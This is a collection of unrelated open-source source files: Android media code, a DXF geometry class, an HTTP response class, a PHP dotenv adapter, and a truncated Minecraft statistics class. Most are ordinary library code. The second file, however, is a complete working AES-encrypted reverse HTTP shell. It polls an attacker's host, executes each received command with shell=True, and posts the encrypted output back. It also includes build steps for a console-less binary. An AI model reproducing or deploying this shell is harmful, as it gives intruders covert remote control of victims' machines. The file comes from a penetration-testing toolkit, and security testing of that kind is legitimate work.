* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.google.android.exoplayer.audio;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.content.IntentFilter;
import android.media.AudioManager;
import com.google.android.exoplayer.util.Assertions;
import com.google.android.exoplayer.util.Util;
/**
* Notifies a listener when the audio playback capabilities change. Call {@link #register} to start
* (or resume) receiving notifications, and {@link #unregister} to stop.
*/
public final class AudioCapabilitiesReceiver {

  /**
   * Listener notified when audio capabilities change.
   */
  public interface Listener {

    /**
     * Called when the audio capabilities change.
     *
     * @param audioCapabilities Current audio capabilities for the device.
     */
    void onAudioCapabilitiesChanged(AudioCapabilities audioCapabilities);

  }

  private final Context context;
  private final Listener listener;
  // Null on SDK < 21, where ACTION_HDMI_AUDIO_PLUG cannot be listened for.
  private final BroadcastReceiver receiver;

  // Last capabilities delivered; compared against to suppress no-op callbacks.
  /* package */ AudioCapabilities audioCapabilities;

  /**
   * Constructs a new audio capabilities receiver.
   *
   * @param context Context for registering to receive broadcasts.
   * @param listener Listener to notify when audio capabilities change.
   */
  public AudioCapabilitiesReceiver(Context context, Listener listener) {
    this.context = Assertions.checkNotNull(context);
    this.listener = Assertions.checkNotNull(listener);
    this.receiver = Util.SDK_INT >= 21 ? new HdmiAudioPlugBroadcastReceiver() : null;
  }

  /**
   * Registers to notify the listener when audio capabilities change. The current capabilities will
   * be returned. It is important to call {@link #unregister} so that the listener can be garbage
   * collected.
   *
   * @return Current audio capabilities for the device.
   */
  @SuppressWarnings("InlinedApi")
  public AudioCapabilities register() {
    // ACTION_HDMI_AUDIO_PLUG is sticky, so registerReceiver returns the last
    // broadcast (current plug state) immediately; null when no receiver or no
    // sticky broadcast exists, in which case defaults are derived.
    Intent stickyIntent = receiver == null ? null
        : context.registerReceiver(receiver, new IntentFilter(AudioManager.ACTION_HDMI_AUDIO_PLUG));
    audioCapabilities = AudioCapabilities.getCapabilities(stickyIntent);
    return audioCapabilities;
  }

  /**
   * Unregisters to stop notifying the listener when audio capabilities change.
   */
  public void unregister() {
    if (receiver != null) {
      context.unregisterReceiver(receiver);
    }
  }

  private final class HdmiAudioPlugBroadcastReceiver extends BroadcastReceiver {

    @Override
    public void onReceive(Context context, Intent intent) {
      // Skip the initial sticky delivery: register() already returned that
      // state to the caller, so only genuine changes are forwarded.
      if (!isInitialStickyBroadcast()) {
        AudioCapabilities newAudioCapabilities = AudioCapabilities.getCapabilities(intent);
        if (!newAudioCapabilities.equals(audioCapabilities)) {
          audioCapabilities = newAudioCapabilities;
          listener.onAudioCapabilitiesChanged(newAudioCapabilities);
        }
      }
    }

  }

}
| Lee-Wills/-tv | mmd/library/src/main/java/com/google/android/exoplayer/audio/AudioCapabilitiesReceiver.java | Java | gpl-3.0 | 3,473 |
#!/usr/bin/python
##########################################################################################################################
#
#
# AES Encrypted Reverse HTTP Shell by:
#
# Dave Kennedy (ReL1K)
# http://www.secmaniac.com
#
##########################################################################################################################
#
##########################################################################################################################
#
# To compile, you will need pyCrypto, it's a pain to install if you do it from source, should get the binary modules
# to make it easier. Can download from here:
# http://www.voidspace.org.uk/cgi-bin/voidspace/downman.py?file=pycrypto-2.0.1.win32-py2.5.zip
#
##########################################################################################################################
#
# This shell works on any platform you want to compile it in. OSX, Windows, Linux, etc.
#
##########################################################################################################################
#
##########################################################################################################################
#
# Below is the steps used to compile the binary. py2exe requires a dll to be used in conjunction
# so py2exe was not used. Instead, pyinstaller was used in order to byte compile the binary.
#
##########################################################################################################################
#
# export VERSIONER_PYTHON_PREFER_32_BIT=yes
# python Configure.py
# python Makespec.py --onefile --noconsole shell.py
# python Build.py shell/shell.spec
#
###########################################################################################################################
import urllib
import urllib2
import httplib
import subprocess
import sys
import base64
import os
from Crypto.Cipher import AES
# the block size for the cipher object; must be 16, 24, or 32 for AES
BLOCK_SIZE = 32
# the character used for padding--with a block cipher such as AES, the value
# you encrypt must be a multiple of BLOCK_SIZE in length. This character is
# used to ensure that your value is always a multiple of BLOCK_SIZE
PADDING = '{'
# one-liner to sufficiently pad the text to be encrypted
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
# one-liners to encrypt/encode and decrypt/decode a string
# encrypt with AES, encode with base64
EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))
DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)
# secret key, change this if you want to be unique
secret = "Fj39@vF4@54&8dE@!)(*^+-pL;'dK3J2"
# create a cipher object using the random secret
cipher = AES.new(secret)
# TURN THIS ON IF YOU WANT PROXY SUPPORT
PROXY_SUPPORT = "OFF"
# THIS WILL BE THE PROXY URL
PROXY_URL = "http://proxyinfo:80"
# USERNAME FOR THE PROXY
USERNAME = "username"
# PASSWORD FOR THE PROXY
PASSWORD = "password"
# here is where we set all of our proxy settings
if PROXY_SUPPORT == "ON":
auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler.add_password(realm='RESTRICTED ACCESS',
uri=PROXY_URL, # PROXY SPECIFIED ABOVE
user=USERNAME, # USERNAME SPECIFIED ABOVE
passwd=PASSWORD) # PASSWORD SPECIFIED ABOVE
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
try:
# our reverse listener ip address
address = sys.argv[1]
# our reverse listener port address
port = sys.argv[2]
# except that we didn't pass parameters
except IndexError:
print " \nAES Encrypted Reverse HTTP Shell by:"
print " Dave Kennedy (ReL1K)"
print " http://www.secmaniac.com"
print "Usage: shell.exe <reverse_ip_address> <port>"
sys.exit()
# loop forever
while 1:
# open up our request handelr
req = urllib2.Request('http://%s:%s' % (address,port))
# grab our response which contains what command we want
message = urllib2.urlopen(req)
# base64 unencode
message = base64.b64decode(message.read())
# decrypt the communications
message = DecodeAES(cipher, message)
# quit out if we receive that command
if message == "quit" or message == "exit":
sys.exit()
# issue the shell command we want
proc = subprocess.Popen(message, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# read out the data of stdout
data = proc.stdout.read() + proc.stderr.read()
# encrypt the data
data = EncodeAES(cipher, data)
# base64 encode the data
data = base64.b64encode(data)
# urlencode the data from stdout
data = urllib.urlencode({'cmd': '%s'}) % (data)
# who we want to connect back to with the shell
h = httplib.HTTPConnection('%s:%s' % (address,port))
# set our basic headers
headers = {"User-Agent" : "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)","Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
# actually post the data
h.request('POST', '/index.aspx', data, headers)
| firebitsbr/raspberry_pwn | src/pentest/revshells/encrypted_http_shell/shell.py | Python | gpl-3.0 | 5,129 |
using System;
using Android.Graphics.Drawables;
using KeePassLib;
namespace keepass2android
{
	/// <summary>
	/// Interface for popup menu items in EntryActivity
	/// </summary>
	internal interface IPopupMenuItem
	{
		/// <summary>Icon drawn next to the menu entry.</summary>
		Drawable Icon { get; }
		/// <summary>Text shown for the menu entry.</summary>
		String Text { get; }
		/// <summary>Invoked when the user selects this menu entry.</summary>
		void HandleClick();
	}
}
#region netDxf library, Copyright (C) 2009-2018 Daniel Carvajal (haplokuon@gmail.com)
// netDxf library
// Copyright (C) 2009-2018 Daniel Carvajal (haplokuon@gmail.com)
//
// This library is free software; you can redistribute it and/or
// modify it under the terms of the GNU Lesser General Public
// License as published by the Free Software Foundation; either
// version 2.1 of the License, or (at your option) any later version.
//
// The above copyright notice and this permission notice shall be included in all
// copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
// FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
// COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
// IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
// CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#endregion
using System;
using netDxf.Tables;
namespace netDxf.Entities
{
/// <summary>
/// Represents a shape entity.
/// </summary>
public class Shape :
EntityObject
{
#region private fields
private string name;
private ShapeStyle style;
private Vector3 position;
private double size;
private double rotation;
private double obliqueAngle;
private double widthFactor;
private double thickness;
#endregion
#region constructors
/// <summary>
/// Initializes a new instance of the <c>Shape</c> class.
/// </summary>
/// <param name="name">Name of the shape which geometry is defined in the shape <see cref="ShapeStyle">style</see>.</param>
/// <param name="style">Shape <see cref="TextStyle">style</see>.</param>
public Shape(string name, ShapeStyle style) : this(name, style, Vector3.Zero, 1.0, 0.0)
{
}
/// <summary>
/// Initializes a new instance of the <c>Shape</c> class.
/// </summary>
/// <param name="name">Name of the shape which geometry is defined in the shape <see cref="ShapeStyle">style</see>.</param>
/// <param name="style">Shape <see cref="TextStyle">style</see>.</param>
/// <param name="position">Shape insertion point.</param>
/// <param name="size">Shape size.</param>
/// <param name="rotation">Shape rotation.</param>
public Shape(string name, ShapeStyle style, Vector3 position, double size, double rotation) : base(EntityType.Shape, DxfObjectCode.Shape)
{
if (string.IsNullOrEmpty(name))
throw new ArgumentNullException(nameof(name));
this.name = name;
if (style == null)
throw new ArgumentNullException(nameof(style));
this.style = style;
this.position = position;
this.size = size;
this.rotation = rotation;
this.obliqueAngle = 0.0;
this.widthFactor = 1.0;
this.thickness = 0.0;
}
#endregion
#region public properties
/// <summary>
/// Gets the shape name.
/// </summary>
public string Name
{
get { return this.name; }
}
/// <summary>
/// Gets the <see cref="ShapeStyle">shape style</see>.
/// </summary>
public ShapeStyle Style
{
get { return this.style; }
internal set
{
if (value == null)
throw new ArgumentNullException(nameof(value));
this.style = value;
}
}
/// <summary>
/// Gets or sets the shape <see cref="Vector3">insertion point</see> in world coordinates.
/// </summary>
public Vector3 Position
{
get { return this.position; }
set { this.position = value; }
}
/// <summary>
/// Gets or sets the size of the shape.
/// </summary>
/// <remarks>
/// The shape size is relative to the actual size of the shape definition.
/// The size value works as an scale value applied to the dimensions of the shape definition,
/// it cannot be zero and, negative values will invert the shape in the local X and Y axis.<br />
/// Values cannot be zero. Default: 1.0.
/// </remarks>
public double Size
{
get { return this.size; }
set
{
if (MathHelper.IsZero(value))
throw new ArgumentOutOfRangeException(nameof(value), value, "The shape cannot be zero.");
this.size = value;
}
}
/// <summary>
/// Gets or sets the shape rotation in degrees.
/// </summary>
public double Rotation
{
get { return this.rotation; }
set { this.rotation = MathHelper.NormalizeAngle(value); }
}
/// <summary>
/// Gets or sets the shape oblique angle in degrees.
/// </summary>
public double ObliqueAngle
{
get { return this.obliqueAngle; }
set { this.obliqueAngle = MathHelper.NormalizeAngle(value); }
}
/// <summary>
/// Gets or sets the shape width factor.
/// </summary>
/// <remarks>Valid values must be greater than zero. Default: 1.0.</remarks>
public double WidthFactor
{
get { return this.widthFactor; }
set
{
if (value <= 0)
throw new ArgumentOutOfRangeException(nameof(value), value, "The shape width factor must be greater than zero.");
this.widthFactor = value;
}
}
/// <summary>
/// Gets or set the shape thickness.
/// </summary>
public double Thickness
{
get { return this.thickness; }
set { this.thickness = value; }
}
#endregion
#region overrides
public override object Clone()
{
Shape entity = new Shape(this.name, (ShapeStyle)this.style.Clone())
{
//EntityObject properties
Layer = (Layer)this.Layer.Clone(),
Linetype = (Linetype)this.Linetype.Clone(),
Color = (AciColor)this.Color.Clone(),
Lineweight = this.Lineweight,
Transparency = (Transparency)this.Transparency.Clone(),
LinetypeScale = this.LinetypeScale,
Normal = this.Normal,
IsVisible = this.IsVisible,
//Shape properties
Position = this.position,
Size = this.size,
Rotation = this.rotation,
ObliqueAngle = this.obliqueAngle,
Thickness = this.thickness
};
foreach (XData data in this.XData.Values)
entity.XData.Add((XData)data.Clone());
return entity;
}
#endregion
}
}
| virtualrobotix/MissionPlanner | ExtLibs/netDxf/Entities/Shape.cs | C# | gpl-3.0 | 7,298 |
/*
* Copyright 2011-2013 Nikhil Marathe <nsm.nikhil@gmail.com>
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to
* deal in the Software without restriction, including without limitation the
* rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
* sell copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
* FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
* IN THE SOFTWARE.
*/
#include "qhttpresponse.h"
#include <QDateTime>
#include <QLocale>
#include "qhttpserver.h"
#include "qhttpconnection.h"
/// Builds a response bound to @p connection. All bookkeeping flags start
/// as "nothing sent yet"; keep-alive is assumed until the headers written
/// later say otherwise.
QHttpResponse::QHttpResponse(QHttpConnection *connection)
    // TODO: parent child relation
    : QObject(0)
    , m_connection(connection)
    , m_headerWritten(false)
    , m_sentConnectionHeader(false)
    , m_sentContentLengthHeader(false)
    , m_sentTransferEncodingHeader(false)
    , m_sentDate(false)
    , m_keepAlive(true)
    , m_last(false)
    , m_useChunkedEncoding(false)
    , m_finished(false)
{
}
/// Trivial destructor; object lifetime is driven by deleteLater() calls
/// in end() and connectionClosed().
QHttpResponse::~QHttpResponse()
{
}
/// Stores a header in m_headers so writeHeaders() can emit it later.
/// Once the response has finished the request is ignored with a warning.
void QHttpResponse::setHeader(const QString &field, const QString &value)
{
    if (m_finished) {
        qWarning() << "QHttpResponse::setHeader() Cannot set headers after response has finished.";
        return;
    }

    m_headers[field] = value;
}
/// Writes a single "field: value\r\n" line straight to the connection.
/// Once the response has finished the request is ignored with a warning.
void QHttpResponse::writeHeader(const char *field, const QString &value)
{
    if (m_finished) {
        qWarning() << "QHttpResponse::writeHeader() Cannot write headers after response has finished.";
        return;
    }

    m_connection->write(field);
    m_connection->write(": ");
    m_connection->write(value.toUtf8());
    m_connection->write("\r\n");
}
/// Emits every header set via setHeader() and fills in the
/// Connection / Transfer-Encoding / Date defaults the user did not supply.
/// As a side effect it derives m_last, m_keepAlive and m_useChunkedEncoding
/// from the user headers, so it must run before body data is written.
void QHttpResponse::writeHeaders()
{
    if (m_finished)
        return;

    foreach(const QString &name, m_headers.keys())
    {
        QString value = m_headers[name];
        // "Connection" decides whether this response closes the socket.
        if (name.compare("connection", Qt::CaseInsensitive) == 0)
        {
            m_sentConnectionHeader = true;
            if (value.compare("close", Qt::CaseInsensitive) == 0)
                m_last = true;
            else
                m_keepAlive = true;
        }
        // "Transfer-Encoding: chunked" switches on chunked body framing.
        else if (name.compare("transfer-encoding", Qt::CaseInsensitive) == 0)
        {
            m_sentTransferEncodingHeader = true;
            if (value.compare("chunked", Qt::CaseInsensitive) == 0)
                m_useChunkedEncoding = true;
        }
        else if (name.compare("content-length", Qt::CaseInsensitive) == 0)
            m_sentContentLengthHeader = true;
        else if (name.compare("date", Qt::CaseInsensitive) == 0)
            m_sentDate = true;
        /// @todo Expect case (??)
        writeHeader(name.toLatin1(), value.toLatin1());
    }

    // Keep-alive is only safe when the client can tell where the body ends
    // (explicit Content-Length or chunked encoding); otherwise close.
    if (!m_sentConnectionHeader)
    {
        if (m_keepAlive && (m_sentContentLengthHeader || m_useChunkedEncoding))
            writeHeader("Connection", "keep-alive");
        else
        {
            m_last = true;
            writeHeader("Connection", "close");
        }
    }

    if (!m_sentContentLengthHeader && !m_sentTransferEncodingHeader)
    {
        if (m_useChunkedEncoding)
            writeHeader("Transfer-Encoding", "chunked");
        else
            m_last = true;
    }

    // Sun, 06 Nov 1994 08:49:37 GMT - RFC 822. Use QLocale::c() so english is used for month and day.
    if (!m_sentDate)
        writeHeader("Date", QLocale::c().toString(QDateTime::currentDateTimeUtc(), "ddd, dd MMM yyyy hh:mm:ss") + " GMT");
}
/// Sends the status line ("HTTP/1.1 <code> <reason>") followed by all
/// headers. May only be called once per response, and only before the
/// response has finished.
void QHttpResponse::writeHead(int status)
{
    if (m_finished)
    {
        qWarning() << "QHttpResponse::writeHead() Cannot write headers after response has finished.";
        return;
    }

    if (m_headerWritten)
    {
        qWarning() << "QHttpResponse::writeHead() Already called once for this response.";
        return;
    }

    // STATUS_CODES maps the numeric code to its reason phrase.
    m_connection->write(QString("HTTP/1.1 %1 %2\r\n").arg(status).arg(STATUS_CODES[status]).toLatin1());
    writeHeaders();
    m_connection->write("\r\n");

    m_headerWritten = true;
}
/// Convenience overload: forwards the enum's numeric value to writeHead(int).
void QHttpResponse::writeHead(StatusCode statusCode)
{
    const int status = static_cast<int>(statusCode);
    writeHead(status);
}
/// Forwards body bytes unmodified to the connection. Requires writeHead()
/// to have been called first, and the response to still be open.
void QHttpResponse::write(const QByteArray &data)
{
    if (m_finished)
    {
        qWarning() << "QHttpResponse::write() Cannot write body after response has finished.";
        return;
    }

    if (!m_headerWritten)
    {
        qWarning() << "QHttpResponse::write() You must call writeHead() before writing body data.";
        return;
    }

    m_connection->write(data);
}
/// Writes any final @p data, marks the response finished, emits done()
/// and schedules this object for deletion.
void QHttpResponse::end(const QByteArray &data)
{
    if (m_finished)
    {
        qWarning() << "QHttpResponse::end() Cannot write end after response has finished.";
        return;
    }

    if (data.size() > 0)
        write(data);

    m_finished = true;

    emit done();

    /// @todo End connection and delete ourselves. Is this a still valid note?
    deleteLater();
}
/// Invoked when the underlying connection goes away: the response can never
/// be used again, so mark it finished and schedule deletion.
void QHttpResponse::connectionClosed()
{
    m_finished = true;
    deleteLater();
}
| mkiol/kaktus | sailfish/qhttpserver/qhttpresponse.cpp | C++ | gpl-3.0 | 5,608 |
package org.ovirt.engine.ui.common.widget.uicommon.vm;
import org.ovirt.engine.ui.common.CommonApplicationConstants;
import org.ovirt.engine.ui.common.system.ClientStorage;
import org.ovirt.engine.ui.common.uicommon.model.SearchableTableModelProvider;
import org.ovirt.engine.ui.common.widget.table.column.TextColumnWithTooltip;
import org.ovirt.engine.ui.common.widget.uicommon.AbstractModelBoundTableWidget;
import org.ovirt.engine.ui.uicommonweb.models.vms.VmAppListModel;
import com.google.gwt.event.shared.EventBus;
/**
 * Table widget backing {@link VmAppListModel}: displays a single text column
 * holding the name of each application reported for the VM.
 */
public class VmAppListModelTable extends AbstractModelBoundTableWidget<String, VmAppListModel> {

    public VmAppListModelTable(
            SearchableTableModelProvider<String, VmAppListModel> modelProvider,
            EventBus eventBus, ClientStorage clientStorage, CommonApplicationConstants constants) {
        super(modelProvider, eventBus, clientStorage, false);
    }

    @Override
    public void initTable(CommonApplicationConstants constants) {
        // Each row value is itself the application name, so the column
        // simply echoes the row value back.
        TextColumnWithTooltip<String> column = new TextColumnWithTooltip<String>() {
            @Override
            public String getValue(String value) {
                return value;
            }
        };
        getTable().addColumn(column, constants.installedApp());
    }
}
| jtux270/translate | ovirt/frontend/webadmin/modules/gwt-common/src/main/java/org/ovirt/engine/ui/common/widget/uicommon/vm/VmAppListModelTable.java | Java | gpl-3.0 | 1,287 |
/*
* Copyright 2018 Google, Inc.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are
* met: redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer;
* redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution;
* neither the name of the copyright holders nor the names of its
* contributors may be used to endorse or promote products derived from
* this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
* A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
* OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
* SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
* LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
* Authors: Gabe Black
*/
#ifndef __SYSTEMC_EXT_DT_BIT_MESSAGES_HH__
#define __SYSTEMC_EXT_DT_BIT_MESSAGES_HH__
namespace sc_core
{

// Report message ids raised by the sc_dt bit/logic vector datatypes.
// Only the identifiers are declared here; the message strings are
// defined in the matching implementation file.
extern const char SC_ID_LENGTH_MISMATCH_[];
extern const char SC_ID_INCOMPATIBLE_TYPES_[];
extern const char SC_ID_CANNOT_CONVERT_[];
extern const char SC_ID_INCOMPATIBLE_VECTORS_[];
extern const char SC_ID_VALUE_NOT_VALID_[];
extern const char SC_ID_ZERO_LENGTH_[];
extern const char SC_ID_VECTOR_CONTAINS_LOGIC_VALUE_[];
extern const char SC_ID_SC_BV_CANNOT_CONTAIN_X_AND_Z_[];
extern const char SC_ID_VECTOR_TOO_LONG_[];
extern const char SC_ID_VECTOR_TOO_SHORT_[];
extern const char SC_ID_WRONG_VALUE_[];
extern const char SC_ID_LOGIC_Z_TO_BOOL_[];
extern const char SC_ID_LOGIC_X_TO_BOOL_[];

} // namespace sc_core
#endif // __SYSTEMC_EXT_DT_BIT_MESSAGES_HH__
| vineodd/PIMSim | GEM5Simulation/gem5/src/systemc/ext/dt/bit/messages.hh | C++ | gpl-3.0 | 2,324 |
<?php
namespace Dotenv\Environment\Adapter;
use PhpOption\None;
class ApacheAdapter implements AdapterInterface
{
    /**
     * Determines if the adapter is supported.
     *
     * This is only the case when PHP runs as an Apache module, which is
     * when both apache environment functions are available.
     *
     * @return bool
     */
    public function isSupported()
    {
        $canRead = function_exists('apache_getenv');
        $canWrite = function_exists('apache_setenv');

        return $canRead && $canWrite;
    }

    /**
     * Get an environment variable, if it exists.
     *
     * Intentionally unimplemented: this adapter exists solely to overwrite
     * pre-existing apache environment variables, never to read them.
     *
     * @param string $name
     *
     * @return \PhpOption\Option
     */
    public function get($name)
    {
        return None::create();
    }

    /**
     * Set an environment variable.
     *
     * An apache variable is only written when one with the same name
     * already exists; new variables are never created here.
     *
     * @param string $name
     * @param string|null $value
     *
     * @return void
     */
    public function set($name, $value = null)
    {
        if (apache_getenv($name) === false) {
            return;
        }

        apache_setenv($name, (string) $value);
    }

    /**
     * Clear an environment variable.
     *
     * Deliberately a no-op for this adapter.
     *
     * @param string $name
     *
     * @return void
     */
    public function clear($name)
    {
        // Nothing to do here.
    }
}
| lejubila/piGardenWeb | vendor/vlucas/phpdotenv/src/Environment/Adapter/ApacheAdapter.php | PHP | gpl-3.0 | 1,361 |
<?php
// This file is part of Moodle - http://moodle.org/
//
// Moodle is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// Moodle is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Moodle. If not, see <http://www.gnu.org/licenses/>.
declare(strict_types=1);
namespace core_reportbuilder\external;
use renderer_base;
use core\persistent;
use core\external\persistent_exporter;
use core_reportbuilder\manager;
use core_reportbuilder\datasource;
use core_reportbuilder\form\filter as form_filter;
use core_reportbuilder\local\models\report;
use core_reportbuilder\table\custom_report_table;
use core_reportbuilder\table\custom_report_table_filterset;
use core_reportbuilder\table\custom_report_table_view;
use core_reportbuilder\table\custom_report_table_view_filterset;
use core_reportbuilder\local\helpers\report as report_helper;
/**
* Custom report exporter class
*
* @package core_reportbuilder
* @copyright 2021 David Matamoros <davidmc@moodle.com>
* @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
*/
class custom_report_exporter extends persistent_exporter {

    /** @var report The persistent object we will export. */
    protected $persistent = null;

    /** @var bool Whether the report is being rendered in the editor (true) or for viewing (false). */
    protected $editmode;

    /** @var bool $showeditbutton When showing the report on view.php the Edit button has to be hidden */
    protected $showeditbutton;

    /** @var string Requested download format; empty string means no download. */
    protected $download;

    /**
     * report_exporter constructor.
     *
     * @param persistent $persistent
     * @param array $related
     * @param bool $editmode
     * @param bool $showeditbutton
     * @param string $download
     */
    public function __construct(persistent $persistent, array $related = [], bool $editmode = true,
            bool $showeditbutton = true, string $download = '') {
        parent::__construct($persistent, $related);

        $this->editmode = $editmode;
        $this->showeditbutton = $showeditbutton;
        $this->download = $download;
    }

    /**
     * Return the name of the class we are exporting
     *
     * @return string
     */
    protected static function define_class(): string {
        return report::class;
    }

    /**
     * Return a list of objects that are related to the persistent
     *
     * @return array
     */
    protected static function define_related(): array {
        return [
        ];
    }

    /**
     * Return a list of additional properties used only for display
     *
     * @return array
     */
    protected static function define_other_properties(): array {
        return [
            'table' => ['type' => PARAM_RAW],
            'sidebarmenucards' => ['type' => custom_report_menu_cards_exporter::read_properties_definition()],
            'conditions' => ['type' => custom_report_conditions_exporter::read_properties_definition()],
            'filters' => ['type' => custom_report_filters_exporter::read_properties_definition()],
            'sorting' => ['type' => custom_report_columns_sorting_exporter::read_properties_definition()],
            'filtersapplied' => ['type' => PARAM_INT],
            'filtersform' => [
                'type' => PARAM_RAW,
                'optional' => true,
            ],
            'editmode' => ['type' => PARAM_INT],
            'showeditbutton' => ['type' => PARAM_BOOL],
            'javascript' => ['type' => PARAM_RAW],
        ];
    }

    /**
     * Get additional values to inject while exporting
     *
     * @param renderer_base $output
     * @return array
     */
    protected function get_other_values(renderer_base $output): array {
        $filtersform = '';
        $menucards = [];

        if ($this->editmode) {
            // Edit mode: editable table, no download handling required.
            $table = custom_report_table::create($this->persistent->get('id'));
            $table->set_filterset(new custom_report_table_filterset());
        } else {
            // View mode: read-only table honouring the requested download format.
            $table = custom_report_table_view::create($this->persistent->get('id'), $this->download);
            $table->set_filterset(new custom_report_table_view_filterset());

            // Generate filters form if report contains any filters.
            $source = $this->persistent->get('source');

            /** @var datasource $datasource */
            $datasource = new $source($this->persistent);
            if (!empty($datasource->get_active_filters())) {
                $filtersform = $this->generate_filters_form()->render();
            }
        }

        $report = manager::get_report_from_persistent($this->persistent);

        $conditionsexporter = new custom_report_conditions_exporter(null, ['report' => $report]);
        $filtersexporter = new custom_report_filters_exporter(null, ['report' => $report]);
        $sortingexporter = new custom_report_columns_sorting_exporter(null, ['report' => $report]);

        // Sidebar menu cards (available columns) are only needed by the editor UI.
        if ($this->editmode) {
            $menucardexporter = new custom_report_menu_cards_exporter(null, [
                'menucards' => report_helper::get_available_columns($report->get_report_persistent())
            ]);
            $menucards = (array) $menucardexporter->export($output);
        }

        return [
            'table' => $output->render($table),
            'sidebarmenucards' => $menucards,
            'conditions' => (array) $conditionsexporter->export($output),
            'filters' => (array) $filtersexporter->export($output),
            'sorting' => (array) $sortingexporter->export($output),
            'filtersapplied' => $report->get_applied_filter_count(),
            'filtersform' => $filtersform,
            'editmode' => (int)$this->editmode,
            'showeditbutton' => $this->showeditbutton,
            // NOTE(review): always exported empty here; presumably populated
            // later by the renderer/template layer - confirm before relying on it.
            'javascript' => '',
        ];
    }

    /**
     * Generate filters form for the report
     *
     * @return form_filter
     */
    private function generate_filters_form(): form_filter {
        // No extra filter parameters are injected at this point, hence the
        // empty JSON-encoded array.
        $filtersform = new form_filter(null, null, 'post', '', [], true, [
            'reportid' => $this->persistent->get('id'),
            'parameters' => json_encode([]),
        ]);
        $filtersform->set_data_for_dynamic_submission();

        return $filtersform;
    }
}
| michael-milette/moodle | reportbuilder/classes/external/custom_report_exporter.php | PHP | gpl-3.0 | 6,584 |
package net.minecraft.stats;
import com.google.common.collect.Maps;
import com.google.common.collect.Sets;
import com.google.gson.JsonElement;
import com.google.gson.JsonObject;
import com.google.gson.JsonParseException;
import com.google.gson.JsonParser;
import java.io.File;
import java.io.IOException;
import java.lang.reflect.Constructor;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Iterator;
import java.util.Map;
import java.util.Set;
import java.util.Map.Entry;
import net.minecraft.entity.player.EntityPlayer;
import net.minecraft.entity.player.EntityPlayerMP;
import net.minecraft.network.play.server.S37PacketStatistics;
import net.minecraft.server.MinecraftServer;
import net.minecraft.util.ChatComponentTranslation;
import net.minecraft.util.IJsonSerializable;
import net.minecraft.util.TupleIntJsonSerializable;
import org.apache.commons.io.FileUtils;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
public class StatisticsFile extends StatFileWriter
{
private static final Logger logger = LogManager.getLogger();
private final MinecraftServer field_150890_c;
private final File field_150887_d;
private final Set field_150888_e = Sets.newHashSet();
private int field_150885_f = -300;
private boolean field_150886_g = false;
private static final String __OBFID = "CL_00001471";
public StatisticsFile(MinecraftServer p_i45306_1_, File p_i45306_2_)
{
this.field_150890_c = p_i45306_1_;
